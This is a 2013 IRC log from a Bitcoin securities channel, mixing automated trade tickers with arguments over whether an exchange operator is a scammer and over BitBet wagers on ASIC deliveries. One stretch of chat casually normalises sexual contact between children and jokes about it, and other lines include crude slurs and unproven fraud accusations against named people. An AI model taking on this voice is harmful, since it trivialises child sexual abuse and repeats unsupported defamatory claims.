15:30:11 [HAVELOCK] [SMG] 800 @ 0.00021001 = 0.168 BTC [-] Aug 27 15:30:18 [HAVELOCK] [SMG] 300 @ 0.00021 = 0.063 BTC [-] Aug 27 15:31:24 [BTCTC] [LABCOIN] 10 @ 0.003486 = 0.0349 BTC [+] Aug 27 15:31:25 [BTCTC] [LABCOIN] 10 @ 0.003484 = 0.0348 BTC [-] Aug 27 15:32:48 [BTCTC] [ASICMINER-PT] 1 @ 2.646 BTC [-] Aug 27 15:32:49 [BTCTC] [ASICMINER-PT] 1 @ 2.645 BTC [-] Aug 27 15:32:51 [BTCTC] [ASICMINER-PT] 1 @ 2.64 BTC [-] Aug 27 15:32:52 [BTCTC] [ASICMINER-PT] 2 @ 2.639 = 5.278 BTC [-] Aug 27 15:32:53 [BTCTC] [ASICMINER-PT] 1 @ 2.638 BTC [-] Aug 27 15:32:54 [BTCTC] [ASICMINER-PT] 1 @ 2.635 BTC [-] Aug 27 15:32:55 [BTCTC] [ASICMINER-PT] 1 @ 2.63 BTC [-] Aug 27 15:32:57 [BTCTC] [ASICMINER-PT] 1 @ 2.621 BTC [-] Aug 27 15:32:58 [BTCTC] [ASICMINER-PT] 4 @ 2.62 = 10.48 BTC [-] Aug 27 15:33:15 [BTCTC] [DMS.MINING] 15 @ 0.00374 = 0.0561 BTC [+] Aug 27 15:33:26 [BTCTC] [DMS.SELLING] 6 @ 0.0125 = 0.075 BTC [-] Aug 27 15:33:28 [BTCTC] [DMS.SELLING] 19 @ 0.0125 = 0.2375 BTC [-] Aug 27 15:33:29 [BTCTC] [DMS.MINING] 25 @ 0.00374 = 0.0935 BTC [+] Aug 27 15:33:31 [BTCTC] [DMS.PURCHASE] 25 @ 0.01605 = 0.4013 BTC [-] Aug 27 15:34:11 [BTCTC] [DMS.SELLING] 6 @ 0.0125 = 0.075 BTC [-] Aug 27 15:34:13 [BTCTC] [DMS.MINING] 6 @ 0.00374 = 0.0224 BTC [+] Aug 27 15:34:15 [BTCTC] [DMS.PURCHASE] 6 @ 0.01605 = 0.0963 BTC [-] Aug 27 15:34:28 [BTCTC] [RSM] 268 @ 0.01348 = 3.6126 BTC [+] Aug 27 15:34:29 [BTCTC] [RSM] 100 @ 0.01349 = 1.349 BTC [+] Aug 27 15:34:29 [BTCTC] [RSM] 26 @ 0.0135 = 0.351 BTC [+] Aug 27 15:34:31 [BTCTC] [RSM] 50 @ 0.0135 = 0.675 BTC [+] Aug 27 15:34:32 [BTCTC] [RSM] 322 @ 0.0136 = 4.3792 BTC [+] Aug 27 15:34:33 [BTCTC] [RSM] 64 @ 0.014 = 0.896 BTC [+] Aug 27 15:34:34 [BTCTC] [RSM] 112 @ 0.014 = 1.568 BTC [+] Aug 27 15:34:40 [BTCTC] [DMS.MINING] 100 @ 0.00374 = 0.374 BTC [+] Aug 27 15:34:54 [BTCTC] [DMS.SELLING] 6 @ 0.0125 = 0.075 BTC [-] Aug 27 15:34:56 [BTCTC] [DMS.MINING] 6 @ 0.00374 = 0.0224 BTC [+] Aug 27 15:34:58 [BTCTC] [DMS.PURCHASE] 6 @ 0.01605 = 0.0963 BTC [-] Aug 27 15:35:53 [BTCTC] [DMS.MINING] 218 @ 0.00374 = 0.8153 BTC [+] Aug 27 15:37:25 [HAVELOCK] [XBOND] 7 @ 0.001174 = 0.0082 BTC [+] Aug 27 15:37:58 [BTCTC] [LABCOIN] 31 @ 0.003482 = 0.1079 BTC [-] Aug 27 15:38:00 [BTCTC] [LABCOIN] 31 @ 0.003482 = 0.1079 BTC [-] Aug 27 15:38:16 [BTCTC] [LABCOIN] 8 @ 0.003481 = 0.0278 BTC [-] Aug 27 15:38:59 [HAVELOCK] [AM100] 1 @ 0.02371 BTC [-] Aug 27 15:39:28 [HAVELOCK] [AM100] 2 @ 0.02480001 = 0.0496 BTC [+] Aug 27 15:40:01 [HAVELOCK] [XBOND] 3 @ 0.001174 = 0.0035 BTC [+] Aug 27 15:40:04 [BTCTC] [LABCOIN] 4 @ 0.003481 = 0.0139 BTC [-] Aug 27 15:42:04 [BTCTC] [LABCOIN] 4 @ 0.003481 = 0.0139 BTC [-] Aug 27 15:43:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.02784 = 0.0835 BTC [-] Aug 27 15:43:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.02784 = 0.0557 BTC [-] Aug 27 15:44:00 [BTCTC] [LABCOIN] 4 @ 0.003481 = 0.0139 BTC [-] Aug 27 15:44:06 [HAVELOCK] [XBOND] 189 @ 0.001174 = 0.2219 BTC [+] Aug 27 15:44:22 [HAVELOCK] [SMG] 3 @ 0.0002132 = 0.0006 BTC [+] Aug 27 15:44:35 [BTCTC] [LABCOIN] 100 @ 0.003481 = 0.3481 BTC [-] Aug 27 15:44:49 [HAVELOCK] [XBOND] 3 @ 0.001175 = 0.0035 BTC [+] Aug 27 15:44:51 [HAVELOCK] [XBOND] 100 @ 0.001175 = 0.1175 BTC [+] Aug 27 15:45:42 [HAVELOCK] [XBOND] 700 @ 0.00117599 = 0.8232 BTC [+] Aug 27 15:46:09 [BTCTC] [LABCOIN] 38 @ 0.003482 = 0.1323 BTC [+] Aug 27 15:46:14 [HAVELOCK] [XBOND] 199 @ 0.001176 = 0.234 BTC [+] Aug 27 15:46:23 [BTCTC] [LABCOIN] 4 @ 0.003482 = 0.0139 BTC [+] Aug 27 15:46:40 [HAVELOCK] [XBOND] 1000 @ 0.001176 = 1.176 BTC [+] Aug 27 15:47:04 [HAVELOCK] [XBOND] 200 @ 0.001178 = 0.2356 BTC [+] Aug 27 15:47:23 [HAVELOCK] [XBOND] 200 @ 0.001179 = 0.2358 BTC [+] Aug 27 15:47:51 [HAVELOCK] [XBOND] 20 @ 0.00117999 = 0.0236 BTC [+] Aug 27 15:47:52 [HAVELOCK] [XBOND] 1755 @ 0.00117999 = 2.0709 BTC [+] Aug 27 15:48:27 [HAVELOCK] [XBOND] 1000 @ 0.00118 = 1.18 BTC [+] Aug 27 15:53:44 [BTCTC] [DMS.MINING] 15 @ 0.003744 = 0.0562 BTC [+] Aug 27 15:54:21 [MPEX] [S.MPOE] 7771 @ 0.00086949 = 6.7568 BTC [-] Aug 27 15:54:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0278 BTC [-] Aug 27 15:54:43 [BTCTC] [HOSTED-MINING] 30 @ 0.0028 = 0.084 BTC [+] Aug 27 15:55:52 [HAVELOCK] [XBOND] 100 @ 0.00118997 = 0.119 BTC [+] Aug 27 15:56:12 [HAVELOCK] [XBOND] 3000 @ 0.00118999 = 3.57 BTC [+] Aug 27 15:56:32 [HAVELOCK] [XBOND] 4991 @ 0.00119 = 5.9393 BTC [+] Aug 27 15:57:51 [BTCTC] [LABCOIN] 58 @ 0.003482 = 0.202 BTC [+] Aug 27 15:57:53 [BTCTC] [LABCOIN] 515 @ 0.003481 = 1.7927 BTC [-] Aug 27 15:57:54 [BTCTC] [LABCOIN] 92 @ 0.003481 = 0.3203 BTC [-] Aug 27 15:57:55 [BTCTC] [LABCOIN] 1500 @ 0.003481 = 5.2215 BTC [-] Aug 27 15:58:09 [BTCTC] [LABCOIN] 36 @ 0.00348 = 0.1253 BTC [-] Aug 27 15:59:42 kleeck, my youth is leaving me, but my sexual maladaptive traits only seem to strengthen... wtf? Aug 27 16:00:07 Hahaha. Aug 27 16:00:32 [HAVELOCK] [CFIG] 1 @ 0.215 BTC [-] Aug 27 16:00:51 [HAVELOCK] [CFIG] 1 @ 0.215 BTC [-] Aug 27 16:01:03 what's maladaptive even mean in that context Aug 27 16:01:42 It's the PC term for "kids who touch other kids" Aug 27 16:01:48 sexually. Aug 27 16:01:55 ;;seen bugpowder Aug 27 16:01:55 bugpowder was last seen in #bitcoin-assets 4 weeks, 6 days, 19 hours, 15 minutes, and 22 seconds ago: SEC! Aug 27 16:01:56 child child molesters. Aug 27 16:02:15 wait are we talking about the girl accused of playing "doctor" Aug 27 16:02:19 [HAVELOCK] [AM100] 13 @ 0.02480001 = 0.3224 BTC [+] Aug 27 16:02:29 [HAVELOCK] [AM100] 2 @ 0.0273 = 0.0546 BTC [+] Aug 27 16:02:51 [HAVELOCK] [AM100] 10 @ 0.0273 = 0.273 BTC [+] Aug 27 16:04:04 Instead of calling them that, though, the powers that be determined that they just have not sexually developed properly. Aug 27 16:04:31 except kids NOT having sex with kids are sexually maladapted. Aug 27 16:04:34 [HAVELOCK] [AM100] 10 @ 0.0273 = 0.273 BTC [+] Aug 27 16:04:47 [HAVELOCK] [AM100] 30 @ 0.0273 = 0.819 BTC [+] Aug 27 16:05:26 [MPEX] [S.MPOE] 34 @ 0.00087053 = 0.0296 BTC [+] Aug 27 16:05:28 [MPEX] [S.MPOE] 7750 @ 0.00087058 = 6.747 BTC [+] Aug 27 16:06:02 We didn't have many kids that had consensual sex with other kids... Aug 27 16:07:13 [HAVELOCK] [XBOND] 2 @ 0.00116534 = 0.0023 BTC [-] Aug 27 16:08:12 or so you think. Aug 27 16:08:31 how exactly would one know ? Aug 27 16:08:50 That's why we have court rooms! All of my clients had been convicted. Aug 27 16:09:25 "Court ordered placement" Aug 27 16:10:37 I should say most were convicted. Some were wards of the state and were sent by their counties. Aug 27 16:11:29 right. still, functionally speaking the brain matures from infancy to adulthood. this always involves some trial and error, and it'd stand to reason sex is no different. Aug 27 16:12:02 Of course. I think the trick is to not hurt anyone while you error your way to adulthood. Aug 27 16:12:17 it washes off. Aug 27 16:12:25 [BTCTC] [HOSTED-MINING] 7 @ 0.0028 = 0.0196 BTC [+] Aug 27 16:12:55 A lot of my clients grew up with crackwhore Moms, no Dad, and ample amounts of hardcore porn. Aug 27 16:13:47 So, you don't respect the model woman in your life, who probably neglected you, and your main exposure to woman are ones that make money pretending to love being gangbanged. Aug 27 16:14:10 i'm sure there's a deep end of it. but i have the luxury of considering the other end. Aug 27 16:14:38 best i can guess pretty much all kids have some sort of sexual contact with other kids. i had, as a kid, all the kids i knew did, as kids, it's normalcy as far as i can tell. Aug 27 16:15:06 Oh think their is a lot of truth to that. Aug 27 16:16:26 mircea_popescu, have you seen burnside's latest assertions that BTCT is all a game? Aug 27 16:16:40 He has reiterated this? Aug 27 16:16:41 ThickAsThieves did he had the decency to quote my post ? Aug 27 16:17:00 no Aug 27 16:17:08 but i'm about to tear into him a lil more Aug 27 16:17:12 Link? Aug 27 16:17:14 well then excuse me while i ignore some incompetent scammer trying to steal shit from me in order to make fiddy bux. Aug 27 16:17:16 if it Aug 27 16:17:34 's all okay with ye. Aug 27 16:18:03 https://bitcointalk.org/index.php?topic=125629.msg3016617#msg3016617 Aug 27 16:18:07 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Aug 27 16:18:20 "Killed two birds with one stone. Wink The disclosure must now be agreed to before seeing the market or the individual assets. It's virtually the same disclosure as that in the registration agreement, but this way there's a periodic reminder that participants should only be using the site for education/entertainment/fun. I know a lot of people out there are not going to like this Aug 27 16:18:20 much, but we have to make sure people are not being tricked or misled into believing anything on the site is a real security." Aug 27 16:19:48 [HAVELOCK] [CFIG] 1 @ 0.21 BTC [-] Aug 27 16:19:59 [HAVELOCK] [CFIG] 3 @ 0.239 = 0.717 BTC [+] Aug 27 16:20:01 [HAVELOCK] [CFIG] 1 @ 0.2399 BTC [+] Aug 27 16:20:04 [HAVELOCK] [CFIG] 2 @ 0.24 = 0.48 BTC [+] Aug 27 16:22:41 http://bitbet.us/bet/521/labcoins-own-130nm-design-sample-chips-will-be/ Aug 27 16:22:47 this convo is pretty lol. Aug 27 16:22:50 BitBet - Labcoins own 130nm design sample chips will be received by testers by 12TH SEPT 2013 Aug 27 16:22:59 the swede votes his scam into relevancy! Aug 27 16:23:21 (no btc tho) Aug 27 16:24:04 [BTCTC] [DMS.SELLING] 5 @ 0.01231 = 0.0616 BTC [-] Aug 27 16:24:41 lol the guy must have a lot of btc and yet he votes nothing Aug 27 16:24:58 [BTCTC] [BASIC-MINING] 1 @ 0.2106 BTC [+] Aug 27 16:24:59 [BTCTC] [BASIC-MINING] 5 @ 0.2106 = 1.053 BTC [+] Aug 27 16:26:11 [HAVELOCK] [AM100] 10 @ 0.0259 = 0.259 BTC [-] Aug 27 16:26:46 my response https://bitcointalk.org/index.php?topic=125629.msg3018281#msg3018281 Aug 27 16:26:58 not really. it gets expensive to pay your shills and the scammer running the btct thing and then all the fgake volume... Aug 27 16:27:11 you take in 10 btc and spend 11 btc. Aug 27 16:27:17 at least that's my goal on that front. Aug 27 16:27:36 you notice he does not answer about the lawyer Aug 27 16:27:52 [BTCTC] [LABCOIN] 25 @ 0.003585 = 0.0896 BTC [+] Aug 27 16:27:53 [BTCTC] [LABCOIN] 100 @ 0.003586 = 0.3586 BTC [+] Aug 27 16:27:55 [BTCTC] [LABCOIN] 628 @ 0.00359 = 2.2545 BTC [+] Aug 27 16:28:09 oh he did. "This change did not come from them" Aug 27 16:34:53 [BTCTC] [DMS.SELLING] 1 @ 0.01265 BTC [+] Aug 27 16:34:56 [BTCTC] [DMS.SELLING] 15 @ 0.01266 = 0.1899 BTC [+] Aug 27 16:35:03 mircea_popescu you are now calling burnside a scammer? Aug 27 16:35:16 I think he has been... Aug 27 16:35:42 [HAVELOCK] [XBOND] 10 @ 0.0011945 = 0.0119 BTC [+] Aug 27 16:35:55 at least since the labcoin/btcgarden releases Aug 27 16:36:19 [BTCTC] [LABCOIN] 85 @ 0.00359 = 0.3052 BTC [+] Aug 27 16:36:20 [BTCTC] [LABCOIN] 45 @ 0.003591 = 0.1616 BTC [+] Aug 27 16:36:42 [HAVELOCK] [AM100] 1 @ 0.0257999 BTC [-] Aug 27 16:36:48 [HAVELOCK] [CFIG] 1 @ 0.225 BTC [-] Aug 27 16:37:29 mircea_popescu you got mail Aug 27 16:39:20 I bet it's a love letter Aug 27 16:39:24 [BTCTC] [DMS.MINING] 29 @ 0.0037 = 0.1073 BTC [-] Aug 27 16:39:25 [BTCTC] [DMS.MINING] 191 @ 0.003745 = 0.7153 BTC [+] Aug 27 16:39:26 [BTCTC] [DMS.MINING] 56 @ 0.003747 = 0.2098 BTC [+] Aug 27 16:39:27 [BTCTC] [DMS.MINING] 149 @ 0.00377 = 0.5617 BTC [+] Aug 27 16:39:40 < ThickAsThieves> at least since the labcoin/btcgarden releases Aug 27 16:39:50 before that mayyyyyyne Aug 27 16:40:11 ty Aug 27 16:40:11 thise i send via snail mail so i can put some perfume on it Aug 27 16:40:14 [BTCTC] [MININGCO.ETF] 2 @ 0.1199 = 0.2398 BTC [+] Aug 27 16:40:20 those Aug 27 16:40:27 [BTCTC] [DMS.MINING] 3 @ 0.00377 = 0.0113 BTC [+] Aug 27 16:40:44 just that one should have some evidence before accusing people of fraud Aug 27 16:41:25 that's how it usually works.. Aug 27 16:41:30 [BTCTC] [BASIC-MINING] 2 @ 0.2286 = 0.4572 BTC [+] Aug 27 16:41:40 kakobrekla http://trilema.com/2013/the-anatomy-of-a-scam/ last month's news. Aug 27 16:42:02 since everyone is a scammer, maybe you should use scammer levels Aug 27 16:42:12 but everyone is not a scammer. Aug 27 16:42:16 :) Aug 27 16:43:21 you know, it's much like politicians : the corrupt ones love it when the public thinks all politicians are corrupt. Aug 27 16:43:21 [BTCTC] [ASICMINER-PT] 1 @ 2.688 BTC [+] Aug 27 16:43:35 [BTCTC] [DMS.MINING] 7 @ 0.00377 = 0.0264 BTC [+] Aug 27 16:43:44 makes their job that much easier. Aug 27 16:44:01 lol Aug 27 16:44:31 [HAVELOCK] [XBOND] 1 @ 0.0011944 BTC [-] Aug 27 16:44:34 [BTCTC] [ASICMINER-PT] 1 @ 2.689 BTC [+] Aug 27 16:44:35 [BTCTC] [ASICMINER-PT] 1 @ 2.692 BTC [+] Aug 27 16:44:50 well if i were you i'd concentrate on making my own exchange better instead of spending all my time pouring shit over others Aug 27 16:45:01 i like that this topic receives attention though i might not like the outcome. let's say i create some bitbets about "stock x goes up/down", this might be gambling or something else, but wouldn't turn bitbet into a derivate broker, would it? a simulated stock trading plattform with fictitious/non-fictitious securities is not so far away from this imho, but one could also come up with Aug 27 16:45:01 "if it looks like a duck, swims like a duck, ..." Aug 27 16:45:35 gecko_x2 but you're not me, now are you. Aug 27 16:45:48 who knows Aug 27 16:45:53 i do. Aug 27 16:45:56 that'd be the difference. Aug 27 16:46:04 maybe i'm you Aug 27 16:46:06 dexX7 all sorts of things are arguable, in principle. Aug 27 16:46:15 and you're using this nick to create controversy Aug 27 16:46:16 :p Aug 27 16:46:37 maybe this is all a scam Aug 27 16:46:43 what's your standpoint on this topic (not btct in general)? Aug 27 16:46:45 [BTCTC] [ASICMINER-PT] 1 @ 2.695 BTC [+] Aug 27 16:47:20 just that one should have some evidence before accusing people of fraud <<< what evidence is missing? Aug 27 16:47:34 dexX7 my standpoint is that as long as you're allowed to mortgage park avenue and pay your monopoly debts in parker dollars bitbet is no different, and as long as you aren't allowed the foregoing the entire discussion is moot anyway and croix de lorraine. Aug 27 16:47:37 hard evidence? Aug 27 16:47:48 gecko_x2 you're not qualified to judge evidence. Aug 27 16:47:57 okey dokey. Aug 27 16:47:59 :D Aug 27 16:48:42 only you are.. i forgot Aug 27 16:48:55 and maybe one or two others.. Aug 27 16:49:01 the hard evidence has literally been posted by Burnside himself Aug 27 16:49:02 everyone else is incapable Aug 27 16:49:04 hehe Aug 27 16:49:09 unless you arguing someone else posted his comments Aug 27 16:49:16 or he is possessed, etc Aug 27 16:49:25 im sorry if reality contradicts your pedestrian equalitarianism. grow up and all that. Aug 27 16:49:31 i just don't understand the shit slinging Aug 27 16:49:41 what part? Aug 27 16:49:45 you don't understand what you don't understand, actually. Aug 27 16:49:53 so what if they are a scam, then that means in the end everyone will flow back to mpex Aug 27 16:50:03 i don't see the issue Aug 27 16:50:24 "everyone". Aug 27 16:50:29 maybe this is that process? Aug 27 16:50:35 the CEO of Airbus does not spend his days slinging shit at boeing Aug 27 16:50:41 this is not boeing. Aug 27 16:50:45 [BTCTC] [LABCOIN] 77 @ 0.00359 = 0.2764 BTC [-] Aug 27 16:50:45 maybe this results in me moving my securities to another exchange Aug 27 16:50:53 and then other legit issuers doing the same Aug 27 16:50:54 the ceo of airbus does point out when some scam killing people pops up pretending to be airbuz Aug 27 16:51:04 lul Aug 27 16:51:07 ok i'm out Aug 27 16:51:39 toodle-loo Aug 27 16:51:46 the two populations have nothing in common. people with a clue are already on mpex, and have been, long before btct was even invented. Aug 27 16:52:05 stargazing noobs hoping their irrelevancy may somehow be soothed and their poverty magically alleviated moved from glbse to btct Aug 27 16:52:28 they aren't a part of the discussion of bitcoin other than as historical accident, nor of bitcoin securities at all. Aug 27 16:52:54 their one hope is your one hope, which is to say educating themselves. the exact thing you don't want to do, because everything's the same and everyone's equal or w/e. Aug 27 16:57:05 [BTCTC] [DMS.PURCHASE] 17 @ 0.01605 = 0.2729 BTC [-] Aug 27 16:57:08 [BTCTC] [LABCOIN] 138 @ 0.00359 = 0.4954 BTC [-] Aug 27 17:01:07 http://www.washingtonpost.com/blogs/the-switch/wp/2013/08/27/inside-the-bitcoin-advocates-closed-door-meeting-with-federal-regulators/ Aug 27 17:01:09 Inside the Bitcoin advocates’ closed-door meeting with federal regulators Aug 27 17:03:35 how apt. Aug 27 17:04:18 Startups and small businesses hoping to conduct transactions using the currency would be driven out of the United States in the face of heavy regulation, said Marco Santori, Aug 27 17:04:25 who gives a fuck about that? Aug 27 17:04:59 also lol “Right now, it’s $3 to get money out of an ATM,” Aug 27 17:05:15 [BTCTC] [LABCOIN] 55 @ 0.00359 = 0.1975 BTC [-] Aug 27 17:06:07 [BTCTC] [ASICMINER-PT] 1 @ 2.694 BTC [-] Aug 27 17:08:02 the one noteworthy thing is that the press correctly identified the group as representatives of bitcoin foundation, which they are, and bitcoin advocates, which they also are Aug 27 17:08:16 rather than represent them as any of the numerous things they're not. Aug 27 17:09:04 [BTCTC] [LABCOIN] 3 @ 0.003588 = 0.0108 BTC [-] Aug 27 17:10:05 basically they will turn btc to fiat Aug 27 17:10:36 hardly. Aug 27 17:10:41 [HAVELOCK] [CFIG] 1 @ 0.22550001 BTC [+] Aug 27 17:10:58 in the states Aug 27 17:11:06 [HAVELOCK] [AM100] 1 @ 0.02475 BTC [-] Aug 27 17:11:17 to be clear Aug 27 17:11:33 [HAVELOCK] [XBOND] 2 @ 0.00119 = 0.0024 BTC [-] Aug 27 17:11:42 nah, atm there's going to be a six months stretch of wtf amongm the various bureaucrats in the us Aug 27 17:11:51 we'll know what they've figured in spring. Aug 27 17:12:21 why are none of Santori's quotes in quotes? Aug 27 17:12:49 because obama. Aug 27 17:12:57 "if you make a quote it's not a quote." Aug 27 17:13:01 well Aug 27 17:13:36 ill stay with my point and lets talk about it in 12mo Aug 27 17:14:37 what's the new weirdness, I order a mouse from Logitech and is says my order is under review and I'll be contacting in 24h?! Aug 27 17:14:40 [HAVELOCK] [CFIG] 15 @ 0.22550001 = 3.3825 BTC [+] Aug 27 17:14:48 contacted* Aug 27 17:15:10 they dun wanna sell you mice. Aug 27 17:15:21 are you on the suspected nonwhite list ? Aug 27 17:15:55 do they measure my discomfort when there is no better checkbox than "white" for me? Aug 27 17:16:39 possibly. Aug 27 17:17:11 [BTCTC] [LABCOIN] 1 @ 0.00355 BTC [-] Aug 27 17:17:23 at any rate you will now have to send them your voting record and tonsilectomy result to approve the order and any future orders. Aug 27 17:17:27 [BTCTC] [ASICMINER-PT] 1 @ 2.695 BTC [+] Aug 27 17:17:29 mircea_popescu: that "there will be blood" bet started, AFTER, the 1 year birthday for havelock :p so already 1/3 of the result is known :p Aug 27 17:17:33 :p Aug 27 17:17:42 consider it a favor? Aug 27 17:18:01 [BTCTC] [LABCOIN] 58 @ 0.003588 = 0.2081 BTC [+] Aug 27 17:19:34 [BTCTC] [LABCOIN] 50 @ 0.003589 = 0.1795 BTC [+] Aug 27 17:21:47 [BTCTC] [ASICMINER-PT] 1 @ 2.633 BTC [-] Aug 27 17:21:48 [BTCTC] [ASICMINER-PT] 1 @ 2.632 BTC [-] Aug 27 17:21:50 [BTCTC] [LABCOIN] 600 @ 0.003589 = 2.1534 BTC [+] Aug 27 17:22:56 [BTCTC] [LABCOIN] 60 @ 0.003589 = 0.2153 BTC [+] Aug 27 17:24:04 [BTCTC] [LABCOIN] 20 @ 0.003589 = 0.0718 BTC [+] Aug 27 17:24:53 [BTCTC] [LABCOIN] 2 @ 0.003589 = 0.0072 BTC [+] Aug 27 17:25:19 anyone here use bitbet? Aug 27 17:25:31 [BTCTC] [DMS.PURCHASE] 2000 @ 0.01605 = 32.1 BTC [-] Aug 27 17:25:33 http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/ Aug 27 17:25:37 BitBet - Bitfury EU August orders will ship before 1st September 2013 Aug 27 17:25:45 what if they ship 2 units to make up for lower hashrates? Aug 27 17:25:58 is the bet yes or no? Aug 27 17:26:31 [HAVELOCK] [HIM] 1 @ 0.208 BTC [-] Aug 27 17:26:38 [HAVELOCK] [SMG] 20 @ 0.000244 = 0.0049 BTC [+] Aug 27 17:26:53 [HAVELOCK] [SMG] 20 @ 0.000245 = 0.0049 BTC [+] Aug 27 17:26:54 (25 GH/s unit 40W, 400 GH/s unit 400W) Aug 27 17:27:07 [HAVELOCK] [SMG] 200 @ 0.0002469 = 0.0494 BTC [+] Aug 27 17:28:25 fractal seems pretty clear cut neh ? Aug 27 17:28:43 mircea_popescu: just double checking. Aug 27 17:30:25 mircea_popescu: and then there's this... "Atleast 5 deliveries confirmed by respected members of the community required." who arbitrates who is 'respected', and are we talking about bitcointalk users? thanks. Aug 27 17:31:16 well you don't get to know who specifically arbitrates for obvious reasons. the site does. Aug 27 17:31:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.02781 = 0.0556 BTC [+] Aug 27 17:32:00 they may be btctalk users, with the reservation that post count is meaningless on its own, and it does not institute credibility. Aug 27 17:32:08 so in general, if there is some ambiguity to the bet language, users trust the site to make the correct decision, based on previous fairness? Aug 27 17:32:34 pretty much. Aug 27 17:32:57 some users get pissed off with the eventual results on occasion, but what can you do. Aug 27 17:34:16 [BTCTC] [LABCOIN] 705 @ 0.003591 = 2.5317 BTC [+] Aug 27 17:34:17 [BTCTC] [LABCOIN] 120 @ 0.003591 = 0.4309 BTC [+] Aug 27 17:34:28 right. well that bet seems like a sure thing for the NO side based on this post from bitfury stating it will miss performance numbers ... https://bitcointalk.org/index.php?topic=250249.msg3014225#msg3014225 Aug 27 17:34:45 i guess we'll see in a few days Aug 27 17:34:48 it's mostly his money on the yes anyway, afaik, so what can i tell you. Aug 27 17:35:10 oh bitfury's own money on YES? Aug 27 17:35:49 well, it was zeroconf for like 10 btc (you can see this because the yes bet is before the site's own yes/no seed bets) Aug 27 17:36:07 he had a different bet a few months ago where he actually put 100 btc down on yes, which i had verified then Aug 27 17:36:17 so i just asumed it's the same thing this time. i guess ask the guy if you're curious. Aug 27 17:36:45 punin? does he ever come in here? or forums only Aug 27 17:36:47 [BTCTC] [LABCOIN] 1950 @ 0.003592 = 7.0044 BTC [+] Aug 27 17:36:58 is Bitfurystrikesback.com the same seller and pcb as the forum post/user you just linked? Aug 27 17:37:11 i think he comes by occasionally, but don't recall seeing him recently. Aug 27 17:37:39 punin = http://megabigpower.com/shop/ Aug 27 17:37:43 fractal but ThickAsThieves has a point, there's multiple manufactuers, one could compensate at pcb level. Aug 27 17:37:46 so i'm unclear if the bet even applies to him Aug 27 17:37:47 [BTCTC] [LABCOIN] 4 @ 0.003592 = 0.0144 BTC [+] Aug 27 17:38:38 the bet specifically says 'Bitfurystrikesback.com (Bitfury EU reseller) will ship' not a diff manufacturer Aug 27 17:38:46 yeah. Aug 27 17:38:58 and that is not punin Aug 27 17:39:03 but afaik bitfury makes the chips and independent ppl make the boards/units. Aug 27 17:39:05 [HAVELOCK] [XBOND] 80 @ 0.001185 = 0.0948 BTC [-] Aug 27 17:39:32 and even if the chips miss their chip performance, a unit maker could have a board with enough chips on it to meet whatever arbitrary performance he wants. Aug 27 17:40:22 [BTCTC] [LABCOIN] 144 @ 0.003592 = 0.5172 BTC [+] Aug 27 17:40:31 blah fucking boring asics Aug 27 17:40:36 [HAVELOCK] [CFIG] 2 @ 0.215 = 0.43 BTC [-] Aug 27 17:41:17 no. i think punin = bitfurystrikesback.com Aug 27 17:41:32 [BTCTC] [ASICMINER-PT] 1 @ 2.695 BTC [+] Aug 27 17:41:33 [BTCTC] [ASICMINER-PT] 2 @ 2.696 = 5.392 BTC [+] Aug 27 17:41:33 is it ? Aug 27 17:41:44 https://bitcointalk.org/index.php?topic=250249.msg2657622#msg2657622 Aug 27 17:41:45 punin = http://megabigpower.com/shop/ Aug 27 17:41:49 [ANN] Bitfury ASIC sales in EU and Europe Aug 27 17:42:17 he directly states that 'sales are now open' and links to bitfurystrikesback.com in his own post. Aug 27 17:42:22 [BTCTC] [LABCOIN] 100 @ 0.003515 = 0.3515 BTC [-] Aug 27 17:42:22 [BTCTC] [LABCOIN] 85 @ 0.00351 = 0.2984 BTC [-] Aug 27 17:42:23 ah i see it at the bottom Aug 27 17:42:23 [BTCTC] [LABCOIN] 100 @ 0.003509 = 0.3509 BTC [-] Aug 27 17:42:24 [BTCTC] [LABCOIN] 1 @ 0.0035 BTC [-] Aug 27 17:42:25 [BTCTC] [LABCOIN] 4 @ 0.003476 = 0.0139 BTC [-] Aug 27 17:43:08 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [+] Aug 27 17:43:47 [HAVELOCK] [AM100] 10 @ 0.0257899 = 0.2579 BTC [+] Aug 27 17:43:51 in this sentence: " am Red from China, currently working as a translator in a JV." what is a JV? Aug 27 17:44:01 I am* Aug 27 17:44:22 junior varsity? Aug 27 17:44:34 [HAVELOCK] [AM100] 3 @ 0.0257899 = 0.0774 BTC [+] Aug 27 17:44:42 joint venture! Aug 27 17:44:50 [HAVELOCK] [XBOND] 1 @ 0.00118 BTC [-] Aug 27 17:44:56 testing out android irc clients.. this one looks good Aug 27 17:45:17 The only problem i see with the bet, if punin did infact put up the 10BTC himself, is that he can game the results... by doing the following: have 5 of his friends post pictures of boards, saying 'i got my order, the specs are in-line, everything is fine'... and then 2 weeks later when real people get their orders and specs are below advertised, the bet has already finished, and the YES side got all the BTC. gamed. Aug 27 17:45:41 except who are his friends ? Aug 27 17:46:00 when Luke-Jr did this exact thing for bfl, a) bitbet didn't go for it and b) his reputation, such as it was, was permanently ruined. Aug 27 17:46:06 mircea_popescu: we'll know after the fact, if what i said above actaully happens. ;) Aug 27 17:46:08 so kind of a risky game for the friends to play. Aug 27 17:46:11 [BTCTC] [BTC-TRADING-PT] 1 @ 1.061 BTC [-] Aug 27 17:46:41 ah i remember that.... luke is a pretty controversial figure though Aug 27 17:47:01 that's the point i think Aug 27 17:47:03 there's no controversy about his participation in that particular bfl attempted scam. Aug 27 17:47:09 these friends cant be nobodies Aug 27 17:47:22 or shills Aug 27 17:47:25 and in general, if you review the history... patrick harnett was "controversial" until he met his end. Aug 27 17:47:33 [BTCTC] [BTC-TRADING-PT] 2 @ 1.06 = 2.12 BTC [-] Aug 27 17:48:37 [BTCTC] [ASICMINER-PT] 2 @ 2.64 = 5.28 BTC [-] Aug 27 17:49:06 This is androirc.. Not so hot Aug 27 17:49:40 maybe i'll take a gamble with 1 BTC on NO.... I'd certainly be more inclined to put up 10BTC on NO if i had some recourse if there was some sort of fraud after the fact. Aug 27 17:49:55 is this your first time with bitbet ? Aug 27 17:51:40 yeah Aug 27 17:52:17 well so then start small. Aug 27 17:52:44 sounds like a fine plan. Aug 27 17:53:00 mind the weight, too Aug 27 17:53:12 [HAVELOCK] [HIM] 5 @ 0.208 = 1.04 BTC [-] Aug 27 17:53:25 